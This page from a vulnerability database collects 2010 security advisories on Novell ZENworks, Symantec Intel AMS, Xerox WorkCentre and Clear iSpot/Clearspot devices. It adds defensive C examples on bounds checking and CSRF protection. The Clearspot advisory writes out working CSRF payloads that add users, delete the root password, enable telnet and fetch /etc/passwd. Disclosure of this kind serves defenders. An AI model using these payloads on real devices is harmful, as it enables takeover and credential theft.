VARIoT IoT vulnerabilities database

VAR-201012-0610 | No CVE | Novell ZENWorks Remote Management Agent DN Name Remote Code Execution Vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Three remotely reachable flaws are reported in Novell ZENworks 7 Desktop Management 7 SP1. Successful exploits compromise the affected application; failed exploit attempts result in a denial-of-service condition.
1) Remote Management Agent, Console DN field: the ZenRem32.exe process listens by default on TCP and UDP port 1761. When processing the Console DN field of an incoming request, the process can be made to overflow a stack buffer by 2 bytes. This allows remote attackers to execute arbitrary code on vulnerable installations; authentication is not required.
2) Remote Management Agent, uninitialized client-name buffer: when processing incoming connections with specific version fields, ZenRem32.exe fails to initialize a string buffer intended to hold the name of the client. After making allocations based on the size of the uninitialized string, it converts the buffer between wide-char and multi-byte data types. As the pointer is directed at uninitialized memory, this can be abused to corrupt the heap and execute code under the context of the SYSTEM user; authentication is not required.
3) TFTP service (UDP port 69): when handling the filename in a Read Request (opcode 0x01) packet, the process blindly copies user-supplied data into a fixed-length buffer on the stack.
Novell ZENworks 7 Desktop Management 7 SP1 is vulnerable.
----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Novell ZENworks Desktop Management Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA42598
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/42598/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=42598
RELEASE DATE:
2010-12-21
DISCUSS ADVISORY:
http://secunia.com/advisories/42598/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/42598/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42598
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Novell ZENworks Desktop
Management, which can be exploited by malicious people to compromise
a vulnerable system.
1) An error exists in the Remote Management Agent within ZenRem32.exe
when processing certain version fields. This can be exploited to
corrupt heap memory by sending a specially crafted packet to TCP or
UDP port 1761.
2) A boundary error exists in the Remote Management Agent within
ZenRem32.exe when processing the Console DN field of a request. This
can be exploited to cause a stack-based buffer overflow by sending a
specially crafted packet to TCP or UDP port 1761.
3) A boundary error exists in the TFTP service when handling the
filename of a Read Request packet. This can be exploited to cause a
stack-based buffer overflow by sending a specially crafted packet to
UDP port 69.
SOLUTION:
Apply Interim Release 4 Hot Patch 5.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
1, 2) sb, via ZDI.
3) Francis Provencher, Protek Research Lab's.
ORIGINAL ADVISORY:
Novell:
http://www.novell.com/support/viewContent.do?externalId=7007320
http://www.novell.com/support/viewContent.do?externalId=7007339
http://www.novell.com/support/viewContent.do?externalId=7007321
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-283/
http://www.zerodayinitiative.com/advisories/ZDI-10-284/
http://www.zerodayinitiative.com/advisories/ZDI-10-285/
Protek Research Lab's:
http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=20&Itemid=20
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
-- Vendor Response:
Novell states:
Fixed in ZENworks 7 Desktop Management Support Pack 1 Interim Release 4
Hot Patch 5:
http://download.novell.com/Download?buildid=r9kcCymJ7Os
Documented in TID 7007320
http://www.novell.com/support/dynamickc.do?cmd=show&forward=nonthreadedKC&docType=kc&externalId=7007320&sliceId=1
-- Disclosure Timeline:
2010-06-30 - Vulnerability reported to vendor
2010-12-13 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* sb
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details nor any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
VAR-201012-0127 | CVE-2010-3268 | Symantec Antivirus Corporate Edition Used in etc. Intel AMS of GetStringAMSHandler Service disruption in functions (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The GetStringAMSHandler function in prgxhndl.dll in hndlrsvc.exe in the Intel Alert Handler service (aka Symantec Intel Handler service) in Intel Alert Management System (AMS), as used in Symantec Antivirus Corporate Edition 10.1.4.4010 on Windows 2000 SP4 and Symantec Endpoint Protection before 11.x, does not properly validate the CommandLine field of an AMS request, which allows remote attackers to cause a denial of service (application crash) via a crafted request. Symantec Antivirus is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
Symantec Antivirus Corporate Edition 10.1.4.4010 is vulnerable; other versions may also be affected.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://corelabs.coresecurity.com/
Symantec Intel Handler Service Remote DoS
1. *Advisory Information*
Title: Symantec Intel Handler Service Remote DoS
Advisory Id: CORE-2010-0728
Advisory URL:
[http://www.coresecurity.com/content/symantec-intel-handler-service-remote-dos]
Date published: 2010-12-13
Date of last update: 2010-12-13
Vendors contacted: Symantec
Release mode: User release
2. *Vulnerability Information*
Class: Input validation error [CWE-20]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2010-3268
Bugtraq ID: N/A
3. *Vulnerability Description*
The Intel Alert Handler service ('hndlrsvc.exe', part of the Intel Alert
Management System shipped with Symantec Antivirus Corporate Edition)
does not properly validate the 'CommandLine' field of an AMS request. A
source address in a 'MOV' instruction is calculated from values present
in the request, causing a remote denial-of-service.
4. *Vulnerable packages*
. Symantec Antivirus Corporate Edition 10.1.4.4010 on Windows 2000 SP4.
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. Symantec Endpoint Protection 11.x.
6. *Vendor Information, Solutions and Workarounds*
Symantec states that during the SEP 11.x engineering phase SEP was
rewritten so that it no longer uses Intel AMS code. The installation of
AMS is disabled by default for SEP versions that include it. The only
workaround is to disable Intel AMS.
7. *Credits*
This vulnerability was discovered and researched by Nahuel Riva from
Core Security Technologies. Publication was coordinated by Jorge
Lucangeli Obes.
8. *Technical Description / Proof of Concept Code*
The request is handled in 'prgxhndl.dll', called from 'hndlrsvc.exe',
more specifically from function '0x501A105D':
/-----
501A105D /. 55              PUSH EBP
501A105E |. 8BEC            MOV EBP,ESP
501A1060 |. 81EC 60040000   SUB ESP,460
501A1066 |. 8D45 F4         LEA EAX,DWORD PTR SS:[EBP-C]
501A1069 |. 57              PUSH EDI
501A106A |. 50              PUSH EAX
501A106B |. 68 34301A50     PUSH prgxhndl.501A3034        ; ASCII "CommandLine"
501A1070 |. FF75 0C         PUSH DWORD PTR SS:[EBP+C]
501A1073 |. 8BF9            MOV EDI,ECX
501A1075 |. FF75 08         PUSH DWORD PTR SS:[EBP+8]
501A1078 |. E8 33010000     CALL <JMP.&HNDLRSVC.#17_?GetString@AMSHandler@@QAEHPAXKPADPAPAD@Z>
-----/
Inside that function, 'GetStringAMSHandler()' is called to parse the
content of the 'CommandLine' field present in the request. In turn,
'GetStringAMSHandler()' forwards the request to function 'AMSLIB.18'
present in 'AMSLIB.dll', and this function ends up calling the function
that crashes, 'AMSGetPastParamList()', also in 'AMSLIB.dll':
/-----
500733AE |. 8B45 E4         MOV EAX,DWORD PTR SS:[EBP-1C]
500733B1 |. 50              PUSH EAX                      ; /Arg1
500733B2 |. E8 54F3FFFF     CALL AMSLIB.AMSGetPastParamList ; \AMSGetPastParamList
-----/
The crash occurs at address '0x5007278B':
/-----
50072786 |. 8B45 F0 |MOV EAX,DWORD PTR SS:[EBP-10]
50072789 |. 33C9 |XOR ECX,ECX
5007278B |. 8A08 |MOV CL,BYTE PTR DS:[EAX]
5007278D |. 85C9 |TEST ECX,ECX
5007278F |. 75 16 |JNZ SHORT AMSLIB.500727A7
-----/
When trying to read at the memory area pointed to by EAX, this value is
invalid and the service crashes. This part of the code is parsing
(inside a loop) the argument passed in the 'CommandLine' parameter. It
seems that in many parts of the loop the pointer that is loaded from
'[EBP-10]' is calculated from a value present in the request.
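The crash above is a request-controlled pointer: a number taken from the 'CommandLine' parameter list is turned into an address and dereferenced with no check that it lies inside the received buffer. The C program below is an added illustration of that bug class and its fix, written for this page; it is not code from AMS or from this advisory. Its entry-table layout (a 16-bit count followed by 16-bit offset/length pairs) is invented for the example and is not the AMS wire format.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed request layout (an assumption for this example, not the AMS
 * wire format): a 16-bit little-endian entry count, then per entry a 16-bit
 * offset and a 16-bit length that locate a string later in the request. */

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* Shape of the defect: `off` comes straight from the request and becomes a
 * pointer that is dereferenced, exactly like the MOV CL,[EAX] above. Shown
 * for contrast; never call it on untrusted input. */
static int walk_params_unchecked(const uint8_t *req)
{
    size_t count = rd16(req);
    int printable = 0;
    for (size_t i = 0; i < count; i++) {
        const uint8_t *ent = req + 2 + i * 4;
        const uint8_t *s = req + rd16(ent);       /* request-controlled pointer */
        for (size_t j = 0; j < rd16(ent + 2); j++)
            if (s[j] >= 0x20 && s[j] < 0x7f) printable++;
    }
    return printable;
}

/* Hardened walk: every derived address is checked against `len` before use.
 * Returns the number of printable parameter bytes, or -1 for a malformed
 * request (table does not fit, or an entry points outside the buffer). */
static int walk_params_checked(const uint8_t *req, size_t len)
{
    if (len < 2) return -1;
    size_t count = rd16(req);
    size_t table_end = 2 + count * 4;
    if (table_end > len) return -1;
    int printable = 0;
    for (size_t i = 0; i < count; i++) {
        const uint8_t *ent = req + 2 + i * 4;
        size_t off = rd16(ent), n = rd16(ent + 2);
        if (off < table_end || off > len || n > len - off)
            return -1;                            /* would read outside the request */
        for (size_t j = 0; j < n; j++)
            if (req[off + j] >= 0x20 && req[off + j] < 0x7f) printable++;
    }
    return printable;
}

/* Builds a well-formed request from the given strings (constructed input).
 * Returns the request length, or 0 if it would not fit. */
static size_t build_request(uint8_t *buf, size_t buf_size,
                            const char *const *strs, size_t nstrs)
{
    size_t pos = 2 + nstrs * 4;                   /* strings follow the table */
    if (pos > buf_size || nstrs > 0xffff) return 0;
    buf[0] = (uint8_t)nstrs; buf[1] = (uint8_t)(nstrs >> 8);
    for (size_t i = 0; i < nstrs; i++) {
        size_t n = strlen(strs[i]);
        if (n > 0xffff || pos + n > buf_size || pos + n > 0xffff) return 0;
        uint8_t *ent = buf + 2 + i * 4;
        ent[0] = (uint8_t)pos; ent[1] = (uint8_t)(pos >> 8);
        ent[2] = (uint8_t)n;   ent[3] = (uint8_t)(n >> 8);
        memcpy(buf + pos, strs[i], n);
        pos += n;
    }
    return pos;
}

int main(void)
{
    uint8_t req[256];
    const char *const strs[] = {"cmd.exe", "/c dir"};
    size_t len = build_request(req, sizeof req, strs, 2);
    printf("well-formed: unchecked=%d checked=%d\n",
           walk_params_unchecked(req), walk_params_checked(req, len));
    req[2] = 0xff; req[3] = 0xff;                 /* first entry now points far past the end */
    printf("corrupt offset: checked=%d (unchecked would read out of bounds)\n",
           walk_params_checked(req, len));
    return 0;
}
```

The only bound the checked version trusts is the byte count actually received; the count, each offset and each length are all compared against it before any pointer is formed, which is the check the crashing loop lacks.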
9. *Report Timeline*
. 2010-08-12: Initial notification sent to Symantec.
. 2010-08-19: Given that there was no answer since the initial
notification, Core requests a confirmation of reception.
. 2010-08-19: Vendor replies that the initial notification was not
received.
. 2010-08-20: Core resends original advisory draft.
. 2010-08-20: Vendor acknowledges reception of advisory draft.
. 2010-08-25: Vendor replies that the issue looks like a duplicate of
another one, already planned to be fixed in a September/October
timeframe. Vendor will investigate further and give a definite reply.
. 2010-08-26: Core acknowledges this reply.
. 2010-08-26: Vendor confirms that the issue is a duplicate, but will
give credit to Nahuel Riva as "secondary finder". Vendor asks to
postpone the publication of the advisory until a fix is released.
. 2010-08-27: Core agrees to postpone the publication of the advisory,
given that an estimated release date for the fix is provided.
. 2010-08-27: Vendor replies with an estimated release date for the end
of September.
. 2010-08-27: Core agrees with the estimated release date, and requests
the date of the initial report of the vulnerability.
. 2010-09-09: After two weeks with no replies, Core again requests the
date of the initial report of the vulnerability, and asks if the release
of the fix is still on track for the end of September.
. 2010-09-16: Vendor replies that they will not be able to release fixes
before the end of the year, as they have to correct third-party code by
themselves.
. 2010-09-21: Core requests confirmation that the vendor won't release a
fix before the end of the year.
. 2010-09-22: Vendor confirms that they won't be able to release fixes
until the end of the year, as fixing third-party code is taking time.
However, the vendor explains that current versions of the product have
the vulnerable functionality disabled, that old versions of the product
do not install the vulnerable functionality by default, and that
installation of this functionality is not recommended.
. 2010-10-05: Core requests version numbers for vulnerable and
non-vulnerable versions of the software, and asks if vulnerable users
can update to a non-vulnerable version.
. 2010-10-06: Vendor replies with the version numbers and confirms that
vulnerable users have to wait for the patch.
. 2010-10-07: Core decides to push the release date forward and wait for
the release of the patch.
. 2010-10-22: Core asks Symantec for a precise release date for the
fixes, and explains that the publication of the advisory won't be pushed
further than December 2010.
. 2010-10-23: Vendor replies that the last known date was during
December, and that they will confirm a firmer date.
. 2010-11-01: Core asks Symantec if a firmer release date has been
confirmed.
. 2010-11-03: Vendor replies that the engineering team has not confirmed
a release date, and asks if Core can hold the publication of the
advisory until the end of the year.
. 2010-11-25: Core replies that the December 13th release date is fixed,
and requests an update on the status of the patches.
. 2010-12-13: No update received, advisory CORE-2010-0728 is published.
10. *References*
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
[http://corelabs.coresecurity.com].
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].
13. *Disclaimer*
The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/].
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAk0GR4UACgkQyNibggitWa1iKQCfYtzFZOnNGpclzNZEDrwM08wr
gwsAn2UYlqC0+IpliLAVTn/ItK4Sc3ne
=Up/o
-----END PGP SIGNATURE-----
SOLUTION:
Restrict access to trusted hosts only (e.g. via network access
control lists).
----------------------------------------------------------------------
TITLE:
Symantec Products Intel Alert Management System Multiple
Vulnerabilities
SECUNIA ADVISORY ID:
SA43099
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43099/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43099
RELEASE DATE:
2011-01-27
DISCUSS ADVISORY:
http://secunia.com/advisories/43099/#comments
DESCRIPTION:
Multiple vulnerabilities have been reported in Symantec products,
which can be exploited by malicious people to cause a DoS (Denial of
Service) and compromise a vulnerable system.
1) An error in the Intel AMS2 component when processing certain
messages can be exploited to cause a buffer overflow via specially
crafted packets sent to TCP port 38292.
2) An error in the Intel AMS2 component when processing certain
messages can be exploited to run arbitrary commands via specially
crafted packets sent to TCP port 38292.
3) An error in the Intel AMS2 component when processing certain
messages can be exploited to create arbitrary events (e.g. launch a
program or send an email) via specially crafted messages sent to TCP
port 38292.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
* Symantec System Center 10.x
SOLUTION:
Update to version 10.1 MR10.
PROVIDED AND/OR DISCOVERED BY:
* An anonymous researcher via ZDI.
* Jorge Lucangeli Obes, CORE Security.
ORIGINAL ADVISORY:
http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20110126_00
http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20110126_01
----------------------------------------------------------------------
VAR-201012-0375 | No CVE | Xerox WorkCentre Scan to Email Information Disclosure Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
Xerox WorkCentre is a multifunction printer. Its scan-to-email feature is flawed: two different scan-to-email jobs can be mixed into one document, so the contents of one scan can end up in the e-mail produced for another. The problem is reported to occur mostly during high-resolution scanning of complex documents, and it can leak sensitive information. Xerox WorkCentre is prone to an information-disclosure vulnerability.
Attackers may be able to exploit this issue to gain access to potentially sensitive information that may aid in further attacks.
The following models of Xerox WorkCentre are vulnerable:
5735
5740
5745
5755
5765
5775
5790
VAR-201012-0295 | CVE-2010-4507 | ClearSpot of iSpot Cross-site request forgery vulnerability in administrator authentication |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Multiple cross-site request forgery (CSRF) vulnerabilities on the iSpot 2.0.0.0 R1679, and the ClearSpot 2.0.0.0 R1512 and R1786, with firmware 1.9.9.4 allow remote attackers to hijack the authentication of administrators for requests that (1) execute arbitrary commands via the cmd parameter in an act_cmd_result action to webmain.cgi, (2) enable remote management via an enable_remote_access act_network_set action to webmain.cgi, (3) enable the TELNET service via an ENABLE_TELNET act_set_wimax_etc_config action to webmain.cgi, (4) enable TELNET sessions via a certain act_network_set action to webmain.cgi, or (5) read arbitrary files via the FILE_PATH parameter in an act_file_download action to upgrademain.cgi. Clear iSpot and Clearspot are prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible.
The following versions are affected:
iSpot 2.0.0.0 (R1679)
Clearspot 2.0.0.0 (R1512) and 2.0.0.0 (R1786).
----------------------------------------------------------------------
TITLE:
Clear iSpot and Clear Clearspot Cross-Site Request Forgery
Vulnerability
SECUNIA ADVISORY ID:
SA42590
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/42590/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=42590
RELEASE DATE:
2010-12-26
DISCUSS ADVISORY:
http://secunia.com/advisories/42590/#comments
DESCRIPTION:
A vulnerability has been reported in Clear iSpot and Clear Clearspot,
which can be exploited by malicious people to conduct cross-site
request forgery attacks.
The application allows users to perform certain actions via HTTP
requests without making proper validity checks to verify the
requests. This can be exploited to e.g. remove the root password or
enable telnet by tricking a logged-in administrator into visiting a
malicious web site.
The vulnerabilities are reported in Clear iSpot version 2.0.0.0,
firmware version 1.9.9.4 and Clear Clearspot version 2.0.0.0,
firmware version 1.9.9.4.
SOLUTION:
Do not browse untrusted web sites or follow untrusted links while
being logged-in to the application.
PROVIDED AND/OR DISCOVERED BY:
Matthew Jakubowski, Trustwave's SpiderLabs
ORIGINAL ADVISORY:
https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt
----------------------------------------------------------------------
Trustwave's SpiderLabs Security Advisory TWSL2010-008:
Clear iSpot/Clearspot CSRF Vulnerabilities
https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt
Published: 2010-12-10 Version: 1.0
Vendor: Clear (http://www.clear.com)
Products: iSpot / ClearSpot 4G (http://www.clear.com/devices)
Versions affected:
The observed behavior is the result of a design choice, and may be present
on multiple versions.
iSpot version: 2.0.0.0 [R1679 (Jul 6 2010 17:57:37)]
Clearspot versions: 2.0.0.0 [R1512 (May 31 2010 18:57:09)]
2.0.0.0 [R1786 (Aug 4 2010 20:09:06)]
Firmware Version : 1.9.9.4
Hardware Version : R051.2
Device Name : IMW-C615W
Device Manufacturer : INFOMARK (http://infomark.co.kr)
Product Description:
iSpot and ClearSpot 4G are portable 4G devices, that allow users to share
and broadcast their own personal WiFi network. The device connects up to 8
clients at the same time, on the same 4G connection.
Credit: Matthew Jakubowski of Trustwave's SpiderLabs
CVE: CVE-2010-4507
Finding:
These devices are susceptible to Cross-Site Request Forgery (CSRF).
An attacker that is able to coerce a ClearSpot / iSpot user into
following a link can arbitrarily execute system commands on the device. This level
of access also provides a device's client-side SSL certificates, which are
used to perform device authentication. This could lead to a compromise of
ClearWire accounts as well as other personal information.
Add new user:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_cmd_result">
<input type="hidden" name="cmd" value="adduser -S jaku">
<input type="submit">
</form>
or
<img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=adduser%20-S%20jaku'>
Remove root password:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_cmd_result">
<input type="hidden" name="cmd" value="passwd -d root">
<input type="submit">
</form>
or
<img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=passwd%20-d%20root'>
Enable remote administration access:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_network_set">
<input type="hidden" name="enable_remote_access" value="YES">
<input type="hidden" name="remote_access_port" value="80">
<input type="submit">
</form>
or
<img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set&enable_remote_access=YES&remote_access_port=80'>
Enable telnet if not already enabled:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_set_wimax_etc_config">
<input type="hidden" name="ENABLE_TELNET" value="YES">
<input type="submit">
</form>
or
<img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_set_wimax_etc_config&ENABLE_TELNET=YES'>
Allow remote telnet access:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_network_set">
<input type="hidden" name="add_enable" value="YES">
<input type="hidden" name="add_host_ip" value="1">
<input type="hidden" name="add_port" value="23">
<input type="hidden" name="add_protocol" value="BOTH">
<input type="hidden" name="add_memo" value="admintelnet">
<input type="submit">
</form>
or
<img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set&add_enable=YES&add_host_ip=1&add_port=23&add_protocol=both&add_memo=admintelnet'>
Once compromised, it is possible to download any file from the device
using the following method.
Download /etc/passwd file:
<form method="post" action="http://192.168.1.1/cgi-bin/upgrademain.cgi">
<input type="hidden" name="act" value="act_file_download">
<input type="hidden" name="METHOD" value="PATH">
<input type="hidden" name="FILE_PATH" value="/etc/passwd">
<input type="submit">
</form>
or
<img src='http://192.168.1.1/cgi-bin/upgrademain.cgi?act=act_file_download&METHOD=PATH&FILE_PATH=/etc/passwd'>
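Every request above succeeds because webmain.cgi and upgrademain.cgi execute sensitive actions on any request that carries the administrator's session, whether it arrives as a GET from an img tag or a POST from an auto-submitted form, and never check that the request was made on purpose. The C function below is an added example written for this page, not code from Clear, INFOMARK or Trustwave, in the same language as the other examples on this page. It shows the three checks a CGI handler would apply before executing a sensitive act value: refuse GET for state changes (which alone stops every img vector above), refuse a foreign Origin header, and require a per-session anti-CSRF token in the body that matches the one bound to the session cookie. The request struct, the reason codes and the list of sensitive act values are assumptions for the example.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Minimal model of what a CGI handler sees; constructed for this example,
 * not the device's real structures. */
struct request {
    const char *method;        /* "GET" or "POST" */
    const char *origin;        /* Origin header, or NULL if the browser sent none */
    const char *cookie_token;  /* anti-CSRF token bound to the session cookie */
    const char *form_token;    /* anti-CSRF token carried in the request body */
    const char *act;           /* the "act" parameter, e.g. "act_cmd_result" */
};

/* Comparison over the shared prefix without early exit on the first
 * differing byte, so the token cannot be recovered one byte at a time
 * from response timing. */
static bool token_equal(const char *a, const char *b)
{
    if (a == NULL || b == NULL) return false;
    size_t la = strlen(a), lb = strlen(b);
    unsigned diff = (unsigned)(la ^ lb);
    for (size_t i = 0; i < la && i < lb; i++)
        diff |= (unsigned)(a[i] ^ b[i]);
    return diff == 0;
}

/* The act values exercised by the advisory's proofs of concept (assumed
 * list; a real handler would mark every state-changing action). */
static bool is_sensitive(const char *act)
{
    static const char *const acts[] = {
        "act_cmd_result", "act_network_set",
        "act_set_wimax_etc_config", "act_file_download",
    };
    for (size_t i = 0; i < sizeof acts / sizeof acts[0]; i++)
        if (strcmp(act, acts[i]) == 0) return true;
    return false;
}

/* Returns 0 when the request may be executed, otherwise a reason code:
 *   1  sensitive action requested over GET (stops the <img> vectors)
 *   2  Origin header names another site (stops the cross-site <form> vectors)
 *   3  anti-CSRF token missing or not matching the session's token */
int csrf_check(const struct request *r, const char *self_origin)
{
    if (!is_sensitive(r->act)) return 0;
    if (strcmp(r->method, "POST") != 0) return 1;
    if (r->origin != NULL && strcmp(r->origin, self_origin) != 0) return 2;
    if (!token_equal(r->cookie_token, r->form_token)) return 3;
    return 0;
}

int main(void)
{
    const char *self = "http://192.168.1.1";
    struct request img  = {"GET",  NULL, "s3ss10n", NULL, "act_cmd_result"};
    struct request form = {"POST", "http://attacker.example", "s3ss10n", NULL, "act_cmd_result"};
    struct request ok   = {"POST", self, "s3ss10n", "s3ss10n", "act_network_set"};
    printf("img tag: %d, cross-site form: %d, legitimate post: %d\n",
           csrf_check(&img, self), csrf_check(&form, self), csrf_check(&ok, self));
    return 0;
}
```

The token check is the one that actually decides: a browser of 2010 vintage may send no Origin header at all, which is why a missing Origin is tolerated and the request still has to prove it came from the device's own page by echoing a secret the attacker's page cannot read.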
Vendor Response:
No official response is available at the time of release.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Vendor Communication Timeline:
8/26/10 - Vendor contact initiated.
9/30/10 - Vulnerability details provided to vendor.
12/3/10 - Notified vendor of release date. No workaround or patch provided.
12/10/10 - Advisory published.
Revision History:
1.0 Initial publication
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit
https://www.trustwave.com/
About Trustwave's SpiderLabs:
SpiderLabs is the advanced security team at Trustwave responsible for
incident response and forensics, ethical hacking and application security
tests for Trustwave's clients. SpiderLabs has responded to hundreds of
security incidents, performed thousands of ethical hacking exercises and
tested the security of hundreds of business applications for Fortune 500
organizations. For more information visit
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
